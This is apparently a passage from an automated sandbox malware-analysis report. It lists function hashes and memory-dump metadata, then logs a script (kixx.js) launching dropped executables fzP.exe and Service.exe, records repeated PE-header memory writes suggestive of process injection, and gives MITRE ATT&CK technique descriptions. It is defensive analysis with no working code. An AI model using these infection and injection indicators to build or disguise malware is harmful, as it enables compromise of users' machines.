Opcode Fuzzy Hash: 1c53bfef1bdd53c7027df9b8b03622181668549130f543982f7f566ecb9e52ce
Instruction Fuzzy Hash: 8F41A5B56003428FCB6AEF79D59856E7BA3FF853043108A3DE4468B655DF3A9C06CB81

Function 01351771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6273ad183bead513b3ad19813f7350fa5cef1acfd8b831435d3a6e394af0df0
Instruction ID: 6fb1909050250f43b7bd2f4b0673f74cfde3d4bc7bfe06aa22b5305d838e61d0
Opcode Fuzzy Hash: a6273ad183bead513b3ad19813f7350fa5cef1acfd8b831435d3a6e394af0df0
Instruction Fuzzy Hash: F621A7B5F002465FCB48AFBD445436EBEEAAFC9200B15846ED54ADB341DE348C4187A1

Function 01351660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f9a506b1c970cb762a80b30cf1b7f6fc0c4c8b9270e8d97b7560a611892665
Instruction ID: e896f6b93b627d2fd8f802d642fe3b135f5273a2a8586d8c33391239035cb8c6
Opcode Fuzzy Hash: 44f9a506b1c970cb762a80b30cf1b7f6fc0c4c8b9270e8d97b7560a611892665
Instruction Fuzzy Hash: 1021947491020ADFCF05EFB9D44469D7BB6FF88304F208A29E505A7344DB746991CB91

Function 01350CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ced75501ca946cd486664118c6761290f0d39174258a83f65674c69102eadd8
Instruction ID: 8081cc8fb2cc22f12d94d115c6f1daa145628ead8a7117e6173b17cead680a18
Opcode Fuzzy Hash: 9ced75501ca946cd486664118c6761290f0d39174258a83f65674c69102eadd8
Instruction Fuzzy Hash: A8216271700A424BCB6EAB79C45852E7AE6FFC46143104D2CD46A8F680DF35DC098BC2

Function 013507F7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710f65c3d893bb9fb9667800ab8f4b9f537bc9b95eca812d842facfb5f7c7212
Instruction ID: 058333eda6dfafdf67b97385832f7631b23b3129bbab7b54ce571a6be156c927
Opcode Fuzzy Hash: 710f65c3d893bb9fb9667800ab8f4b9f537bc9b95eca812d842facfb5f7c7212
Instruction Fuzzy Hash: 3D1124B05252674FCF03FB2DF89059D3B62EB413047258AA6E4448B11BD939295BCBD1

Function 01350838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a6b1be9e839c24098b15e525625c00e200dc96fc7f3877b2ff1db90271b8e2
Instruction ID: 46bb55b01de8e4d331addfc17db6242a2b0d49d49583a4c1e118bac8f3080bea
Opcode Fuzzy Hash: 86a6b1be9e839c24098b15e525625c00e200dc96fc7f3877b2ff1db90271b8e2
Instruction Fuzzy Hash: 18110AB45212579FCF02EB2AF980A5D3B76FB45204B208B74E9088B21AD6786957CB80

Function 01350848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91dbb099fe28cff5276d5c22cc1d9a8b268942d1ca4b0cf3b441d102c5ac3ec
Instruction ID: 51c9058b52364770006c6977abe70948a6ed96ca9f456d7400a68254a521fffe
Opcode Fuzzy Hash: d91dbb099fe28cff5276d5c22cc1d9a8b268942d1ca4b0cf3b441d102c5ac3ec
Instruction Fuzzy Hash: 4F019C745212279FCF01FB2AF980A5D77A6F744304B209F74A9048B21AD6797957DF80

Analysis Process: Service.exePID: 1436, Parent PID: 6984COMMON

Executed Functions

Function 01321304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170523041b1f83772ab77bb21271b1bf1877914c214c8596edf6a1ce44eb7c47
Instruction ID: a191376a184249589f4666fac54c8411414f763cacb9775f69fc6fe317bb7936
Opcode Fuzzy Hash: 170523041b1f83772ab77bb21271b1bf1877914c214c8596edf6a1ce44eb7c47
Instruction Fuzzy Hash: BB3191B091024ADFCB45EFB8D8446AD7BB2FF88304F2089A9E405A7251DB785E54CF91

Function 01320BD8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801fba00252f432632a8b713c783958d4cbd7c08d445b114a723382acf153156
Instruction ID: 62da55720f925ec338fe8456445b8b981cc779cc5666b81899c89737f0d21239
Opcode Fuzzy Hash: 801fba00252f432632a8b713c783958d4cbd7c08d445b114a723382acf153156
Instruction Fuzzy Hash: 08719571B002068FCB58EF78E85CA2E7BA2FF88704B504978E506DB795DF789C058B81

Function 01320BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987046f0519258774a6984ebe25c2511074727262fcb241ec292c9f52b6a2caa
Instruction ID: c6b9f22f28cfeef8fda1f005cf147a2a341a76b352a09d56604328d1434f7a38
Opcode Fuzzy Hash: 987046f0519258774a6984ebe25c2511074727262fcb241ec292c9f52b6a2caa
Instruction Fuzzy Hash: C0416371A016028FCB59FF78E45C66E7BA3FB88704750893DE81A9B694DF389C458F81

Function 01321771 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 979697936b0f6f9288e1cf2d891cc148fe04c330324c2e18beb2a8410621a190
Instruction ID: a0e508b7577b7d5e594364c85cb9db4d0a26810eb40605821ae91b9d9b92aa5d
Opcode Fuzzy Hash: 979697936b0f6f9288e1cf2d891cc148fe04c330324c2e18beb2a8410621a190
Instruction Fuzzy Hash: 6A21C4B1F0021A5FCB58AFBD98542BE7AEAFFD8650B11893ED54AC3344DE348C0587A1

Function 01321660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa4a077f93c74a072f414af620e2f770adeb9acfee185c2d32ce52b0a7a429d5
Instruction ID: 902d0800ad9929d80ae3d980d1f492041ada4f65d0cc9cd9e556fa1e7d60462d
Opcode Fuzzy Hash: fa4a077f93c74a072f414af620e2f770adeb9acfee185c2d32ce52b0a7a429d5
Instruction Fuzzy Hash: 8A212F7490020AEFCB44EFB8D4446AD7BB6FB88304F208969E505A7240DF785E95CB91

Function 01320CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f42fa04f76b94a08693e536bb598882824fe7c3af1764e546bba0b2395294c
Instruction ID: befd8c530b59e1107c7e46c8f06b1def8eda06a8f8ffa9557c7a9ba53f937e74
Opcode Fuzzy Hash: 52f42fa04f76b94a08693e536bb598882824fe7c3af1764e546bba0b2395294c
Instruction Fuzzy Hash: 38216D72700A524BCB2EEB7DD41852E7AE6FF846183108E3CD56A8B680DF34DC094BD2

Function 01320838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9e4db915f416a3f2ba6eb44f3f31940e93a14711cfe395f5014c1f1e1ad06d
Instruction ID: 83e8fde807c54c4f79c911237f3c1c12c6a0a8a6511997aba365e05551f62a03
Opcode Fuzzy Hash: ba9e4db915f416a3f2ba6eb44f3f31940e93a14711cfe395f5014c1f1e1ad06d
Instruction Fuzzy Hash: D311EF70515246EFCB41EF68F994A453BA6FB483047208EB8F808AB225DE7C6D598F81

Function 01320848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef866f09f3410498649b428ac871f9c1bae86273ee7d8526285de8a2b6204a4
Instruction ID: 5c40e9bbb0ac7cf9360d7d305f125859f747e4af19fddc11a734b6f5663bdf7f
Opcode Fuzzy Hash: aef866f09f3410498649b428ac871f9c1bae86273ee7d8526285de8a2b6204a4
Instruction Fuzzy Hash: 9E01AD70501206EFCB41EF28F985A5577A6F748304B60DEB8B808AB225DE7C6D599F81

Function 01320901 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2435111840.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1320000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bd8be9c7b0db73270d1e1a86f3e7a8c2c8a7667e8406880f52d4532ad0e9e7
Instruction ID: cd51d38acd91e98e43b30bd22e49b832ab47fd9fa289d4e3bc5687eda7177405
Opcode Fuzzy Hash: b8bd8be9c7b0db73270d1e1a86f3e7a8c2c8a7667e8406880f52d4532ad0e9e7
Instruction Fuzzy Hash: AAD05B3070E3904FCB165F78AA1C2283FA39F42209F0845EEE44EDB5A7D535881CC741

Analysis Process: Service.exePID: 2468, Parent PID: 6984COMMON

Executed Functions

Function 007D0901 Relevance: 3.8, Strings: 3, Instructions: 65COMMON

Download Yara Rule

Strings

0Pu, xrefs: 007D0948
0Pu, xrefs: 007D096F
Haq, xrefs: 007D095D

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID: 0Pu$0Pu$Haq
API String ID: 0-2790568266
Opcode ID: 66f23f2eaac4d3b0490a4105b77c8a9829194bbb7961f8dd6707c1acd6094c0d
Instruction ID: 8b332b6f9b5cc2cf0e01b9ec982d066a48a6d60b8e1a46e4375a137e885c7411
Opcode Fuzzy Hash: 66f23f2eaac4d3b0490a4105b77c8a9829194bbb7961f8dd6707c1acd6094c0d
Instruction Fuzzy Hash: A5216F30E05218CFCB44EFB885693AE7BB1AB44300F1185BAD449EB395DB789E05CBC1

Function 007D0BD8 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb6004b89d77278c46bae3decbdd3c3dd95f8985a1ecc02221f422ea4159089
Instruction ID: 8af750051285446321b782bb53579df334948eb31e7e9f76ac38a1736959a81a
Opcode Fuzzy Hash: 4fb6004b89d77278c46bae3decbdd3c3dd95f8985a1ecc02221f422ea4159089
Instruction Fuzzy Hash: 2F71C6757002058FCB19EB78E85866E7BB7FF84711F208929E40ADB7A5DF749C018B81

Function 007D1771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620d4e0a4b1d37a56baec4719a8ed69db5617a03e4957032a05d733e18caa768
Instruction ID: 02f89679fbd90d35d3ef84bff110f935c4cfbf29c358856cdae00aeb298cf995
Opcode Fuzzy Hash: 620d4e0a4b1d37a56baec4719a8ed69db5617a03e4957032a05d733e18caa768
Instruction Fuzzy Hash: 812192B1B002059FCB58AFBD485836EBAE7AFC9310B25482DD54ED7391DF388C028761

Function 007D1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a988f1987547fe8cb2dc86994f7a6ad64f543d9f74b4ac11ef750d3c524715
Instruction ID: 1a5048c0d40e077de255d2b374a06cc36859326c133a8bbfb7da5135b4c67e8a
Opcode Fuzzy Hash: 41a988f1987547fe8cb2dc86994f7a6ad64f543d9f74b4ac11ef750d3c524715
Instruction Fuzzy Hash: 33218178A0030ADFCB05EFB8D8946AE7BB6FF84304F204969E405A7354DB746A91CF91

Function 007D0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8863bb53ca85b83d6f7d41b55e9464deed2dec4c743ffc8d19c97d2d730c2db9
Instruction ID: 8f491a82bcadb06ee9920d9406d3a1b9f4030d4374b62371d276ae1f5e6b8fc5
Opcode Fuzzy Hash: 8863bb53ca85b83d6f7d41b55e9464deed2dec4c743ffc8d19c97d2d730c2db9
Instruction Fuzzy Hash: FE2162727007024BCB6EAB79945816E7AE2FF842143108E3DD06A8B790DF38ED058BD2

Function 007D0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2434796197.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7d0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa1d2eb0f9f74672fb92afe3282e80c18b7ff09e9dd69d02d87755d6478f0c9
Instruction ID: c13d1b5b3e8e0dec01b7727a672213874ca77e2428e40afc16fa5179e5b40523
Opcode Fuzzy Hash: 6fa1d2eb0f9f74672fb92afe3282e80c18b7ff09e9dd69d02d87755d6478f0c9
Instruction Fuzzy Hash: 57019B7851130A9FCB42FF18F9D0A5677AEF744714F209E54B804CB329D6B46E559F80

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process created: C:\Users\user\AppData\Local\Temp\fzP.exe "C:\Users\user\AppData\Local\Temp\fzP.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 7C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 620000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory written: C:\Users\user\AppData\Local\Temp\fzP.exe base: 1D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 5B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 140000 value starts with: 4D5A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

